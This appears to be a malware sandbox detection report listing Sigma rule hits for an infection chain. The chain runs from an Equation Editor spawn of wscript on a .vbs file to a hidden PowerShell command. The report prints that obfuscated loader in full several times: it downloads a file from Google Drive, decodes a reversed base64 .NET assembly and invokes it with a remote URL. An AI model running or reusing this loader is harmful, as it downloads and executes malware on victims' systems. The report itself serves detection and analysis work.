                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0Lklu
                  Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0Lklu
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3700, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" , ProcessId: 3840, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3700, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" , ProcessId: 3840, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0Lklu
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, QueryName: ip-api.com
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3700, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" , ProcessId: 3840, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3700, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0Lklu
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ 